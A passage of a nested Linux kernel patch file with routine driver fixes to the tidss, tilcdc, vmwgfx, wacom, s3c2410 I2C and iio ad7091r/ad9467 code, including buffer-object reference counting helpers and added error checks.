++		dev_err(dev, "Failed to set DSS PM to suspended\n");
++		return ret;
++	}
++
++	return ret;
+ }
+ 
+ int dispc_init(struct tidss_device *tidss)
+@@ -2726,10 +2777,6 @@ int dispc_init(struct tidss_device *tidss)
+ 			return r;
+ 	}
+ 
+-	/* K2G display controller does not support soft reset */
+-	if (feat->subrev != DISPC_K2G)
+-		dispc_softreset(dispc);
+-
+ 	for (i = 0; i < dispc->feat->num_vps; i++) {
+ 		u32 gamma_size = dispc->feat->vp_feat.color.gamma_size;
+ 		u32 *gamma_table;
+@@ -2778,6 +2825,10 @@ int dispc_init(struct tidss_device *tidss)
+ 	of_property_read_u32(dispc->dev->of_node, "max-memory-bandwidth",
+ 			     &dispc->memory_bandwidth_limit);
+ 
++	r = dispc_init_hw(dispc);
++	if (r)
++		return r;
++
+ 	tidss->dispc = dispc;
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/tidss/tidss_kms.c b/drivers/gpu/drm/tidss/tidss_kms.c
+index afb2879980c6c..995bac488392a 100644
+--- a/drivers/gpu/drm/tidss/tidss_kms.c
++++ b/drivers/gpu/drm/tidss/tidss_kms.c
+@@ -4,8 +4,6 @@
+  * Author: Tomi Valkeinen <tomi.valkeinen@ti.com>
+  */
+ 
+-#include <linux/dma-fence.h>
+-
+ #include <drm/drm_atomic.h>
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_bridge.h>
+@@ -27,7 +25,6 @@ static void tidss_atomic_commit_tail(struct drm_atomic_state *old_state)
+ {
+ 	struct drm_device *ddev = old_state->dev;
+ 	struct tidss_device *tidss = to_tidss(ddev);
+-	bool fence_cookie = dma_fence_begin_signalling();
+ 
+ 	dev_dbg(ddev->dev, "%s\n", __func__);
+ 
+@@ -38,7 +35,6 @@ static void tidss_atomic_commit_tail(struct drm_atomic_state *old_state)
+ 	drm_atomic_helper_commit_modeset_enables(ddev, old_state);
+ 
+ 	drm_atomic_helper_commit_hw_done(old_state);
+-	dma_fence_end_signalling(fence_cookie);
+ 	drm_atomic_helper_wait_for_flip_done(ddev, old_state);
+ 
+ 	drm_atomic_helper_cleanup_planes(ddev, old_state);
+diff --git a/drivers/gpu/drm/tilcdc/tilcdc_drv.c b/drivers/gpu/drm/tilcdc/tilcdc_drv.c
+index f72755b8ea14c..86d34b77b37db 100644
+--- a/drivers/gpu/drm/tilcdc/tilcdc_drv.c
++++ b/drivers/gpu/drm/tilcdc/tilcdc_drv.c
+@@ -138,7 +138,7 @@ static int tilcdc_irq_install(struct drm_device *dev, unsigned int irq)
+ 	if (ret)
+ 		return ret;
+ 
+-	priv->irq_enabled = false;
++	priv->irq_enabled = true;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c b/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
+index ae01d22b8f840..c46f380d91499 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
+@@ -595,10 +595,9 @@ static int vmw_user_bo_synccpu_release(struct drm_file *filp,
+ 		if (!(flags & drm_vmw_synccpu_allow_cs)) {
+ 			atomic_dec(&vmw_bo->cpu_writers);
+ 		}
+-		ttm_bo_put(&vmw_bo->base);
++		vmw_user_bo_unref(&vmw_bo);
+ 	}
+ 
+-	drm_gem_object_put(&vmw_bo->base.base);
+ 	return ret;
+ }
+ 
+@@ -638,8 +637,7 @@ int vmw_user_bo_synccpu_ioctl(struct drm_device *dev, void *data,
+ 			return ret;
+ 
+ 		ret = vmw_user_bo_synccpu_grab(vbo, arg->flags);
+-		vmw_bo_unreference(&vbo);
+-		drm_gem_object_put(&vbo->base.base);
++		vmw_user_bo_unref(&vbo);
+ 		if (unlikely(ret != 0)) {
+ 			if (ret == -ERESTARTSYS || ret == -EBUSY)
+ 				return -EBUSY;
+@@ -713,7 +711,6 @@ int vmw_user_bo_lookup(struct drm_file *filp,
+ 	}
+ 
+ 	*out = gem_to_vmw_bo(gobj);
+-	ttm_bo_get(&(*out)->base);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_cotable.c b/drivers/gpu/drm/vmwgfx/vmwgfx_cotable.c
+index 79b30dc9d8253..97e56a94eaf80 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_cotable.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_cotable.c
+@@ -407,8 +407,8 @@ static int vmw_cotable_resize(struct vmw_resource *res, size_t new_size)
+ 	 * for the new COTable. Initially pin the buffer object to make sure
+ 	 * we can use tryreserve without failure.
+ 	 */
+-	ret = vmw_bo_create(dev_priv, new_size, &vmw_mob_placement,
+-			    true, true, vmw_bo_bo_free, &buf);
++	ret = vmw_gem_object_create(dev_priv, new_size, &vmw_mob_placement,
++				    true, true, vmw_bo_bo_free, &buf);
+ 	if (ret) {
+ 		DRM_ERROR("Failed initializing new cotable MOB.\n");
+ 		return ret;
+@@ -475,7 +475,7 @@ static int vmw_cotable_resize(struct vmw_resource *res, size_t new_size)
+ 
+ 	vmw_resource_mob_attach(res);
+ 	/* Let go of the old mob. */
+-	vmw_bo_unreference(&old_buf);
++	vmw_user_bo_unref(&old_buf);
+ 	res->id = vcotbl->type;
+ 
+ 	ret = dma_resv_reserve_fences(bo->base.resv, 1);
+@@ -492,7 +492,7 @@ out_map_new:
+ out_wait:
+ 	ttm_bo_unpin(bo);
+ 	ttm_bo_unreserve(bo);
+-	vmw_bo_unreference(&buf);
++	vmw_user_bo_unref(&buf);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+index 8459fab9d9797..136f1cdcf8cdf 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+@@ -969,6 +969,11 @@ static inline void vmw_bo_prio_del(struct vmw_buffer_object *vbo, int prio)
+ /**
+  * GEM related functionality - vmwgfx_gem.c
+  */
++extern int vmw_gem_object_create(struct vmw_private *dev_priv,
++				  size_t size, struct ttm_placement *placement,
++				  bool interruptible, bool pin,
++				  void (*bo_free)(struct ttm_buffer_object *bo),
++				  struct vmw_buffer_object **p_bo);
+ extern int vmw_gem_object_create_with_handle(struct vmw_private *dev_priv,
+ 					     struct drm_file *filp,
+ 					     uint32_t size,
+@@ -1600,6 +1605,21 @@ vmw_bo_reference(struct vmw_buffer_object *buf)
+ 	return buf;
+ }
+ 
++static inline struct vmw_buffer_object *vmw_user_bo_ref(struct vmw_buffer_object *vbo)
++{
++	drm_gem_object_get(&vbo->base.base);
++	return vbo;
++}
++
++static inline void vmw_user_bo_unref(struct vmw_buffer_object **buf)
++{
++	struct vmw_buffer_object *tmp_buf = *buf;
++
++	*buf = NULL;
++	if (tmp_buf)
++		drm_gem_object_put(&tmp_buf->base.base);
++}
++
+ static inline void vmw_fifo_resource_inc(struct vmw_private *dev_priv)
+ {
+ 	atomic_inc(&dev_priv->num_fifo_resources);
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+index 7e59469e1cb9f..bc7f02e4ecebb 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+@@ -1147,7 +1147,7 @@ static int vmw_translate_mob_ptr(struct vmw_private *dev_priv,
+ 				 SVGAMobId *id,
+ 				 struct vmw_buffer_object **vmw_bo_p)
+ {
+-	struct vmw_buffer_object *vmw_bo;
++	struct vmw_buffer_object *vmw_bo, *tmp_bo;
+ 	uint32_t handle = *id;
+ 	struct vmw_relocation *reloc;
+ 	int ret;
+@@ -1159,8 +1159,8 @@ static int vmw_translate_mob_ptr(struct vmw_private *dev_priv,
+ 		return PTR_ERR(vmw_bo);
+ 	}
+ 	ret = vmw_validation_add_bo(sw_context->ctx, vmw_bo, true, false);
+-	ttm_bo_put(&vmw_bo->base);
+-	drm_gem_object_put(&vmw_bo->base.base);
++	tmp_bo = vmw_bo;
++	vmw_user_bo_unref(&tmp_bo);
+ 	if (unlikely(ret != 0))
+ 		return ret;
+ 
+@@ -1202,7 +1202,7 @@ static int vmw_translate_guest_ptr(struct vmw_private *dev_priv,
+ 				   SVGAGuestPtr *ptr,
+ 				   struct vmw_buffer_object **vmw_bo_p)
+ {
+-	struct vmw_buffer_object *vmw_bo;
++	struct vmw_buffer_object *vmw_bo, *tmp_bo;
+ 	uint32_t handle = ptr->gmrId;
+ 	struct vmw_relocation *reloc;
+ 	int ret;
+@@ -1214,8 +1214,8 @@ static int vmw_translate_guest_ptr(struct vmw_private *dev_priv,
+ 		return PTR_ERR(vmw_bo);
+ 	}
+ 	ret = vmw_validation_add_bo(sw_context->ctx, vmw_bo, false, false);
+-	ttm_bo_put(&vmw_bo->base);
+-	drm_gem_object_put(&vmw_bo->base.base);
++	tmp_bo = vmw_bo;
++	vmw_user_bo_unref(&tmp_bo);
+ 	if (unlikely(ret != 0))
+ 		return ret;
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_gem.c b/drivers/gpu/drm/vmwgfx/vmwgfx_gem.c
+index 4d2c28e39f4e0..e7a533e39155c 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_gem.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_gem.c
+@@ -133,6 +133,22 @@ void vmw_gem_destroy(struct ttm_buffer_object *bo)
+ 	kfree(vbo);
+ }
+ 
++int vmw_gem_object_create(struct vmw_private *vmw,
++			  size_t size, struct ttm_placement *placement,
++			  bool interruptible, bool pin,
++			  void (*bo_free)(struct ttm_buffer_object *bo),
++			  struct vmw_buffer_object **p_bo)
++{
++	int ret = vmw_bo_create(vmw, size, placement, interruptible, pin, bo_free, p_bo);
++
++	if (ret != 0)
++		goto out_no_bo;
++
++	(*p_bo)->base.base.funcs = &vmw_gem_object_funcs;
++out_no_bo:
++	return ret;
++}
++
+ int vmw_gem_object_create_with_handle(struct vmw_private *dev_priv,
+ 				      struct drm_file *filp,
+ 				      uint32_t size,
+@@ -141,16 +157,14 @@ int vmw_gem_object_create_with_handle(struct vmw_private *dev_priv,
+ {
+ 	int ret;
+ 
+-	ret = vmw_bo_create(dev_priv, size,
+-			    (dev_priv->has_mob) ?
++	ret = vmw_gem_object_create(dev_priv, size,
++				    (dev_priv->has_mob) ?
+ 				    &vmw_sys_placement :
+ 				    &vmw_vram_sys_placement,
+-			    true, false, &vmw_gem_destroy, p_vbo);
++				    true, false, &vmw_gem_destroy, p_vbo);
+ 	if (ret != 0)
+ 		goto out_no_bo;
+ 
+-	(*p_vbo)->base.base.funcs = &vmw_gem_object_funcs;
+-
+ 	ret = drm_gem_handle_create(filp, &(*p_vbo)->base.base, handle);
+ out_no_bo:
+ 	return ret;
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+index aab6389cb4aab..aa571b75cd07f 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+@@ -1402,8 +1402,8 @@ static int vmw_create_bo_proxy(struct drm_device *dev,
+ 	/* Reserve and switch the backing mob. */
+ 	mutex_lock(&res->dev_priv->cmdbuf_mutex);
+ 	(void) vmw_resource_reserve(res, false, true);
+-	vmw_bo_unreference(&res->backup);
+-	res->backup = vmw_bo_reference(bo_mob);
++	vmw_user_bo_unref(&res->backup);
++	res->backup = vmw_user_bo_ref(bo_mob);
+ 	res->backup_offset = 0;
+ 	vmw_resource_unreserve(res, false, false, false, NULL, 0);
+ 	mutex_unlock(&res->dev_priv->cmdbuf_mutex);
+@@ -1599,10 +1599,8 @@ static struct drm_framebuffer *vmw_kms_fb_create(struct drm_device *dev,
+ 
+ err_out:
+ 	/* vmw_user_lookup_handle takes one ref so does new_fb */
+-	if (bo) {
+-		vmw_bo_unreference(&bo);
+-		drm_gem_object_put(&bo->base.base);
+-	}
++	if (bo)
++		vmw_user_bo_unref(&bo);
+ 	if (surface)
+ 		vmw_surface_unreference(&surface);
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c b/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
+index b5b311f2a91a4..abc354ead4e8b 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
+@@ -457,8 +457,7 @@ int vmw_overlay_ioctl(struct drm_device *dev, void *data,
+ 
+ 	ret = vmw_overlay_update_stream(dev_priv, buf, arg, true);
+ 
+-	vmw_bo_unreference(&buf);
+-	drm_gem_object_put(&buf->base.base);
++	vmw_user_bo_unref(&buf);
+ 
+ out_unlock:
+ 	mutex_unlock(&overlay->mutex);
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_resource.c b/drivers/gpu/drm/vmwgfx/vmwgfx_resource.c
+index c7d645e5ec7bf..30d1c1918bb48 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_resource.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_resource.c
+@@ -140,7 +140,7 @@ static void vmw_resource_release(struct kref *kref)
+ 		if (res->coherent)
+ 			vmw_bo_dirty_release(res->backup);
+ 		ttm_bo_unreserve(bo);
+-		vmw_bo_unreference(&res->backup);
++		vmw_user_bo_unref(&res->backup);
+ 	}
+ 
+ 	if (likely(res->hw_destroy != NULL)) {
+@@ -330,10 +330,10 @@ static int vmw_resource_buf_alloc(struct vmw_resource *res,
+ 		return 0;
+ 	}
+ 
+-	ret = vmw_bo_create(res->dev_priv, res->backup_size,
+-			    res->func->backup_placement,
+-			    interruptible, false,
+-			    &vmw_bo_bo_free, &backup);
++	ret = vmw_gem_object_create(res->dev_priv, res->backup_size,
++				    res->func->backup_placement,
++				    interruptible, false,
++				    &vmw_bo_bo_free, &backup);
+ 	if (unlikely(ret != 0))
+ 		goto out_no_bo;
+ 
+@@ -452,11 +452,11 @@ void vmw_resource_unreserve(struct vmw_resource *res,
+ 			vmw_resource_mob_detach(res);
+ 			if (res->coherent)
+ 				vmw_bo_dirty_release(res->backup);
+-			vmw_bo_unreference(&res->backup);
++			vmw_user_bo_unref(&res->backup);
+ 		}
+ 
+ 		if (new_backup) {
+-			res->backup = vmw_bo_reference(new_backup);
++			res->backup = vmw_user_bo_ref(new_backup);
+ 
+ 			/*
+ 			 * The validation code should already have added a
+@@ -544,7 +544,7 @@ out_no_reserve:
+ 	ttm_bo_put(val_buf->bo);
+ 	val_buf->bo = NULL;
+ 	if (backup_dirty)
+-		vmw_bo_unreference(&res->backup);
++		vmw_user_bo_unref(&res->backup);
+ 
+ 	return ret;
+ }
+@@ -719,7 +719,7 @@ int vmw_resource_validate(struct vmw_resource *res, bool intr,
+ 		goto out_no_validate;
+ 	else if (!res->func->needs_backup && res->backup) {
+ 		WARN_ON_ONCE(vmw_resource_mob_attached(res));
+-		vmw_bo_unreference(&res->backup);
++		vmw_user_bo_unref(&res->backup);
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_shader.c b/drivers/gpu/drm/vmwgfx/vmwgfx_shader.c
+index 51e83dfa1cace..303f7a82f3509 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_shader.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_shader.c
+@@ -177,7 +177,7 @@ static int vmw_gb_shader_init(struct vmw_private *dev_priv,
+ 
+ 	res->backup_size = size;
+ 	if (byte_code) {
+-		res->backup = vmw_bo_reference(byte_code);
++		res->backup = vmw_user_bo_ref(byte_code);
+ 		res->backup_offset = offset;
+ 	}
+ 	shader->size = size;
+@@ -806,8 +806,7 @@ static int vmw_shader_define(struct drm_device *dev, struct drm_file *file_priv,
+ 				    shader_type, num_input_sig,
+ 				    num_output_sig, tfile, shader_handle);
+ out_bad_arg:
+-	vmw_bo_unreference(&buffer);
+-	drm_gem_object_put(&buffer->base.base);
++	vmw_user_bo_unref(&buffer);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c b/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
+index 1a1a286bc749f..50769528c3f3c 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
+@@ -683,9 +683,6 @@ static void vmw_user_surface_base_release(struct ttm_base_object **p_base)
+ 	    container_of(base, struct vmw_user_surface, prime.base);
+ 	struct vmw_resource *res = &user_srf->srf.res;
+ 
+-	if (res && res->backup)
+-		drm_gem_object_put(&res->backup->base.base);
+-
+ 	*p_base = NULL;
+ 	vmw_resource_unreference(&res);
+ }
+@@ -848,23 +845,17 @@ int vmw_surface_define_ioctl(struct drm_device *dev, void *data,
+ 	 * expect a backup buffer to be present.
+ 	 */
+ 	if (dev_priv->has_mob && req->shareable) {
+-		uint32_t backup_handle;
+-
+-		ret = vmw_gem_object_create_with_handle(dev_priv,
+-							file_priv,
+-							res->backup_size,
+-							&backup_handle,
+-							&res->backup);
++		ret = vmw_gem_object_create(dev_priv,
++					    res->backup_size,
++					    &vmw_sys_placement,
++					    true,
++					    false,
++					    &vmw_gem_destroy,
++					    &res->backup);
+ 		if (unlikely(ret != 0)) {
+ 			vmw_resource_unreference(&res);
+ 			goto out_unlock;
+ 		}
+-		vmw_bo_reference(res->backup);
+-		/*
+-		 * We don't expose the handle to the userspace and surface
+-		 * already holds a gem reference
+-		 */
+-		drm_gem_handle_delete(file_priv, backup_handle);
+ 	}
+ 
+ 	tmp = vmw_resource_reference(&srf->res);
+@@ -1505,7 +1496,7 @@ vmw_gb_surface_define_internal(struct drm_device *dev,
+ 		if (ret == 0) {
+ 			if (res->backup->base.base.size < res->backup_size) {
+ 				VMW_DEBUG_USER("Surface backup buffer too small.\n");
+-				vmw_bo_unreference(&res->backup);
++				vmw_user_bo_unref(&res->backup);
+ 				ret = -EINVAL;
+ 				goto out_unlock;
+ 			} else {
+@@ -1519,8 +1510,6 @@ vmw_gb_surface_define_internal(struct drm_device *dev,
+ 							res->backup_size,
+ 							&backup_handle,
+ 							&res->backup);
+-		if (ret == 0)
+-			vmw_bo_reference(res->backup);
+ 	}
+ 
+ 	if (unlikely(ret != 0)) {
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index c1270db121784..165ed872fa4e7 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -2646,8 +2646,8 @@ static void wacom_wac_finger_slot(struct wacom_wac *wacom_wac,
+ {
+ 	struct hid_data *hid_data = &wacom_wac->hid_data;
+ 	bool mt = wacom_wac->features.touch_max > 1;
+-	bool prox = hid_data->tipswitch &&
+-		    report_touch_events(wacom_wac);
++	bool touch_down = hid_data->tipswitch && hid_data->confidence;
++	bool prox = touch_down && report_touch_events(wacom_wac);
+ 
+ 	if (touch_is_muted(wacom_wac)) {
+ 		if (!wacom_wac->shared->touch_down)
+@@ -2697,24 +2697,6 @@ static void wacom_wac_finger_slot(struct wacom_wac *wacom_wac,
+ 	}
+ }
+ 
+-static bool wacom_wac_slot_is_active(struct input_dev *dev, int key)
+-{
+-	struct input_mt *mt = dev->mt;
+-	struct input_mt_slot *s;
+-
+-	if (!mt)
+-		return false;
+-
+-	for (s = mt->slots; s != mt->slots + mt->num_slots; s++) {
+-		if (s->key == key &&
+-			input_mt_get_value(s, ABS_MT_TRACKING_ID) >= 0) {
+-			return true;
+-		}
+-	}
+-
+-	return false;
+-}
+-
+ static void wacom_wac_finger_event(struct hid_device *hdev,
+ 		struct hid_field *field, struct hid_usage *usage, __s32 value)
+ {
+@@ -2765,14 +2747,8 @@ static void wacom_wac_finger_event(struct hid_device *hdev,
+ 	}
+ 
+ 	if (usage->usage_index + 1 == field->report_count) {
+-		if (equivalent_usage == wacom_wac->hid_data.last_slot_field) {
+-			bool touch_removed = wacom_wac_slot_is_active(wacom_wac->touch_input,
+-				wacom_wac->hid_data.id) && !wacom_wac->hid_data.tipswitch;
+-
+-			if (wacom_wac->hid_data.confidence || touch_removed) {
+-				wacom_wac_finger_slot(wacom_wac, wacom_wac->touch_input);
+-			}
+-		}
++		if (equivalent_usage == wacom_wac->hid_data.last_slot_field)
++			wacom_wac_finger_slot(wacom_wac, wacom_wac->touch_input);
+ 	}
+ }
+ 
+diff --git a/drivers/i2c/busses/i2c-s3c2410.c b/drivers/i2c/busses/i2c-s3c2410.c
+index 36dab9cd208cf..8e3838c42a8c2 100644
+--- a/drivers/i2c/busses/i2c-s3c2410.c
++++ b/drivers/i2c/busses/i2c-s3c2410.c
+@@ -220,8 +220,17 @@ static bool is_ack(struct s3c24xx_i2c *i2c)
+ 	int tries;
+ 
+ 	for (tries = 50; tries; --tries) {
+-		if (readl(i2c->regs + S3C2410_IICCON)
+-			& S3C2410_IICCON_IRQPEND) {
++		unsigned long tmp = readl(i2c->regs + S3C2410_IICCON);
++
++		if (!(tmp & S3C2410_IICCON_ACKEN)) {
++			/*
++			 * Wait a bit for the bus to stabilize,
++			 * delay estimated experimentally.
++			 */
++			usleep_range(100, 200);
++			return true;
++		}
++		if (tmp & S3C2410_IICCON_IRQPEND) {
+ 			if (!(readl(i2c->regs + S3C2410_IICSTAT)
+ 				& S3C2410_IICSTAT_LASTBIT))
+ 				return true;
+@@ -274,16 +283,6 @@ static void s3c24xx_i2c_message_start(struct s3c24xx_i2c *i2c,
+ 
+ 	stat |= S3C2410_IICSTAT_START;
+ 	writel(stat, i2c->regs + S3C2410_IICSTAT);
+-
+-	if (i2c->quirks & QUIRK_POLL) {
+-		while ((i2c->msg_num != 0) && is_ack(i2c)) {
+-			i2c_s3c_irq_nextbyte(i2c, stat);
+-			stat = readl(i2c->regs + S3C2410_IICSTAT);
+-
+-			if (stat & S3C2410_IICSTAT_ARBITR)
+-				dev_err(i2c->dev, "deal with arbitration loss\n");
+-		}
+-	}
+ }
+ 
+ static inline void s3c24xx_i2c_stop(struct s3c24xx_i2c *i2c, int ret)
+@@ -690,7 +689,7 @@ static void s3c24xx_i2c_wait_idle(struct s3c24xx_i2c *i2c)
+ static int s3c24xx_i2c_doxfer(struct s3c24xx_i2c *i2c,
+ 			      struct i2c_msg *msgs, int num)
+ {
+-	unsigned long timeout;
++	unsigned long timeout = 0;
+ 	int ret;
+ 
+ 	ret = s3c24xx_i2c_set_master(i2c);
+@@ -710,16 +709,19 @@ static int s3c24xx_i2c_doxfer(struct s3c24xx_i2c *i2c,
+ 	s3c24xx_i2c_message_start(i2c, msgs);
+ 
+ 	if (i2c->quirks & QUIRK_POLL) {
+-		ret = i2c->msg_idx;
++		while ((i2c->msg_num != 0) && is_ack(i2c)) {
++			unsigned long stat = readl(i2c->regs + S3C2410_IICSTAT);
+ 
+-		if (ret != num)
+-			dev_dbg(i2c->dev, "incomplete xfer (%d)\n", ret);
++			i2c_s3c_irq_nextbyte(i2c, stat);
+ 
+-		goto out;
++			stat = readl(i2c->regs + S3C2410_IICSTAT);
++			if (stat & S3C2410_IICSTAT_ARBITR)
++				dev_err(i2c->dev, "deal with arbitration loss\n");
++		}
++	} else {
++		timeout = wait_event_timeout(i2c->wait, i2c->msg_num == 0, HZ * 5);
+ 	}
+ 
+-	timeout = wait_event_timeout(i2c->wait, i2c->msg_num == 0, HZ * 5);
+-
+ 	ret = i2c->msg_idx;
+ 
+ 	/*
+diff --git a/drivers/iio/adc/ad7091r-base.c b/drivers/iio/adc/ad7091r-base.c
+index 8e252cde735b9..0e5d3d2e9c985 100644
+--- a/drivers/iio/adc/ad7091r-base.c
++++ b/drivers/iio/adc/ad7091r-base.c
+@@ -174,8 +174,8 @@ static const struct iio_info ad7091r_info = {
+ 
+ static irqreturn_t ad7091r_event_handler(int irq, void *private)
+ {
+-	struct ad7091r_state *st = (struct ad7091r_state *) private;
+-	struct iio_dev *iio_dev = dev_get_drvdata(st->dev);
++	struct iio_dev *iio_dev = private;
++	struct ad7091r_state *st = iio_priv(iio_dev);
+ 	unsigned int i, read_val;
+ 	int ret;
+ 	s64 timestamp = iio_get_time_ns(iio_dev);
+@@ -234,7 +234,7 @@ int ad7091r_probe(struct device *dev, const char *name,
+ 	if (irq) {
+ 		ret = devm_request_threaded_irq(dev, irq, NULL,
+ 				ad7091r_event_handler,
+-				IRQF_TRIGGER_FALLING | IRQF_ONESHOT, name, st);
++				IRQF_TRIGGER_FALLING | IRQF_ONESHOT, name, iio_dev);
+ 		if (ret)
+ 			return ret;
+ 	}
+diff --git a/drivers/iio/adc/ad9467.c b/drivers/iio/adc/ad9467.c
+index 7534572f74757..811525857d29f 100644
+--- a/drivers/iio/adc/ad9467.c
++++ b/drivers/iio/adc/ad9467.c
+@@ -119,9 +119,9 @@ struct ad9467_state {
+ 	struct spi_device		*spi;
+ 	struct clk			*clk;
+ 	unsigned int			output_mode;
++	unsigned int                    (*scales)[2];
+ 
+ 	struct gpio_desc		*pwrdown_gpio;
+-	struct gpio_desc		*reset_gpio;
+ };
+ 
+ static int ad9467_spi_read(struct spi_device *spi, unsigned int reg)
+@@ -163,9 +163,10 @@ static int ad9467_reg_access(struct adi_axi_adc_conv *conv, unsigned int reg,
+ 
+ 	if (readval == NULL) {
+ 		ret = ad9467_spi_write(spi, reg, writeval);
+-		ad9467_spi_write(spi, AN877_ADC_REG_TRANSFER,
+-				 AN877_ADC_TRANSFER_SYNC);
+-		return ret;
++		if (ret)
++			return ret;
++		return ad9467_spi_write(spi, AN877_ADC_REG_TRANSFER,
++					AN877_ADC_TRANSFER_SYNC);
+ 	}
+ 
+ 	ret = ad9467_spi_read(spi, reg);
+@@ -212,6 +213,7 @@ static void __ad9467_get_scale(struct adi_axi_adc_conv *conv, int index,
+ 	.channel = _chan,						\
+ 	.info_mask_shared_by_type = BIT(IIO_CHAN_INFO_SCALE) |		\
+ 		BIT(IIO_CHAN_INFO_SAMP_FREQ),				\
++	.info_mask_shared_by_type_available = BIT(IIO_CHAN_INFO_SCALE), \
+ 	.scan_index = _si,						\
+ 	.scan_type = {							\
+ 		.sign = _sign,						\
+@@ -273,10 +275,13 @@ static int ad9467_get_scale(struct adi_axi_adc_conv *conv, int *val, int *val2)
+ 	const struct ad9467_chip_info *info1 = to_ad9467_chip_info(info);
+ 	struct ad9467_state *st = adi_axi_adc_conv_priv(conv);
+ 	unsigned int i, vref_val;
++	int ret;
+ 
+-	vref_val = ad9467_spi_read(st->spi, AN877_ADC_REG_VREF);
++	ret = ad9467_spi_read(st->spi, AN877_ADC_REG_VREF);
++	if (ret < 0)
++		return ret;
+ 
+-	vref_val &= info1->vref_mask;
++	vref_val = ret & info1->vref_mask;
+ 
+ 	for (i = 0; i < info->num_scales; i++) {
+ 		if (vref_val == info->scale_table[i][1])
+@@ -297,6 +302,7 @@ static int ad9467_set_scale(struct adi_axi_adc_conv *conv, int val, int val2)
+ 	struct ad9467_state *st = adi_axi_adc_conv_priv(conv);
+ 	unsigned int scale_val[2];
+ 	unsigned int i;
++	int ret;
+ 
+ 	if (val != 0)
+ 		return -EINVAL;
+@@ -306,11 +312,13 @@ static int ad9467_set_scale(struct adi_axi_adc_conv *conv, int val, int val2)
+ 		if (scale_val[0] != val || scale_val[1] != val2)
+ 			continue;
+ 
+-		ad9467_spi_write(st->spi, AN877_ADC_REG_VREF,
+-				 info->scale_table[i][1]);
+-		ad9467_spi_write(st->spi, AN877_ADC_REG_TRANSFER,
+-				 AN877_ADC_TRANSFER_SYNC);
+-		return 0;
++		ret = ad9467_spi_write(st->spi, AN877_ADC_REG_VREF,
++				       info->scale_table[i][1]);
++		if (ret < 0)
++			return ret;
++
++		return ad9467_spi_write(st->spi, AN877_ADC_REG_TRANSFER,
++					AN877_ADC_TRANSFER_SYNC);
+ 	}
+ 
+ 	return -EINVAL;
+@@ -359,6 +367,26 @@ static int ad9467_write_raw(struct adi_axi_adc_conv *conv,
+ 	}
+ }
+ 
++static int ad9467_read_avail(struct adi_axi_adc_conv *conv,
++			     struct iio_chan_spec const *chan,
++			     const int **vals, int *type, int *length,
++			     long mask)
++{
++	const struct adi_axi_adc_chip_info *info = conv->chip_info;
++	struct ad9467_state *st = adi_axi_adc_conv_priv(conv);
++
++	switch (mask) {
++	case IIO_CHAN_INFO_SCALE:
++		*vals = (const int *)st->scales;
++		*type = IIO_VAL_INT_PLUS_MICRO;
++		/* Values are stored in a 2D matrix */
++		*length = info->num_scales * 2;
++		return IIO_AVAIL_LIST;
++	default:
++		return -EINVAL;
++	}
++}
++
+ static int ad9467_outputmode_set(struct spi_device *spi, unsigned int mode)
+ {
+ 	int ret;
+@@ -371,6 +399,26 @@ static int ad9467_outputmode_set(struct spi_device *spi, unsigned int mode)
+ 				AN877_ADC_TRANSFER_SYNC);
+ }
+ 
++static int ad9467_scale_fill(struct adi_axi_adc_conv *conv)
++{
++	const struct adi_axi_adc_chip_info *info = conv->chip_info;
++	struct ad9467_state *st = adi_axi_adc_conv_priv(conv);
++	unsigned int i, val1, val2;
++
++	st->scales = devm_kmalloc_array(&st->spi->dev, info->num_scales,
++					sizeof(*st->scales), GFP_KERNEL);
++	if (!st->scales)
++		return -ENOMEM;
++
++	for (i = 0; i < info->num_scales; i++) {
++		__ad9467_get_scale(conv, i, &val1, &val2);
++		st->scales[i][0] = val1;
++		st->scales[i][1] = val2;
++	}
++
++	return 0;
++}
++
+ static int ad9467_preenable_setup(struct adi_axi_adc_conv *conv)
+ {
